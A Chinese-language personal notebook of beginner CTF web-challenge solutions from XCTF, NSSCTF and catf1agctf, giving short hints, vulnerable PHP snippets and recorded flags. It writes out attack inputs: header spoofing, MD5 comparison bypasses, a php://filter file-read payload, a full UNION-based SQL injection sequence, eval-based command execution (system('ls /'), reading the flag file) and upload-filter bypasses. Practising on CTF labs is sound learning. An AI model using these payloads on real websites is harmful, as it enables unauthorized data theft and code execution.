web刷题小记

碰到web题老是被卡,故开始刷题

攻防世界

攻防世界 (xctf.org.cn)

xff_referer

1.ip>>X-Forwarded-For

2.referer表示来自

NSS

[SWPUCTF 2021 新生赛]gift_F12

https://www.nssctf.cn/problem/382

全局搜索flag别忘记看hint改flag的格式

[SWPUCTF 2021 新生赛]jicao

1.代码审计,注意json格式解码,post

<?php
highlight_file('index.php');
include("flag.php");
$id=$_POST['id'];
$json=json_decode($_GET['json'],true);
if ($id=="wllmNB"&&$json['x']=="wllm")
{echo $flag;}
?>
NSSCTF{75422e92-a2b6-4ad2-ab28-3febd84a3bf9}

[SWPUCTF 2021 新生赛]easy_md5 

md5绕过

a.弱等于(==)绕过

url:

http://node5.anna.nssctf.cn:28158?name=240610708

post:

password=QLTHNDT

b.数组绕过:

参考:[SWPUCTF 2021 新生赛]easy_md5-优快云博客

[SWPUCTF 2021 新生赛]include 

include_once($file);

include题目的标志

node4.anna.nssctf.cn:28571/?file=php://filter/read=convert.base64-encode/resource=flag.php

伪协议读取

[SWPUCTF 2021 新生赛]easy_sql

?wllm=-1' order by 3--+
?wllm=-1' order by 4--+
?wllm=-1' union select 1,2,3--+
?wllm=-1' union select 1,2,database()--+
?wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
?wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
?wllm=-1' union select 1,2,group_concat(id,flag) from test_tb--+ 

参考:

sql注入详解-优快云博客

group_concat用法详解-优快云博客

[SWPUCTF 2021 新生赛]easyrce

rec:eval

/?url=system("ls%20/");
/?url=system("cat%20/flllllaaaaaaggggggg");

[SWPUCTF 2021 新生赛]easyupload1.0 

上传文件 

修改content-type为image/jpeg 

url/upload/phpinfo.php 访问即可

[LitCTF 2023]我Flag呢？ 

查看源码ctrl+f搜flag即可 

[SWPUCTF 2021 新生赛]easyupload2.0

将后缀改成phtml即可

catf1agctf

intval

subject.catf1ag.cn:40292/?num=123a

<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
include('flag.php');
show_source('./index.php');
$num = $_GET['num'];
$num2 = intval($num);
if(isset($num) && $num != '123'){
    if($num == 123){
        echo $flag;
    }else{
        echo 'flag{this_flag_is_False}';
    }
}else{
    echo '你输入点东西行不行...';
}

?> 
#catf1ag{0zjbnretf2svxu9oykqa5dp74wc63g}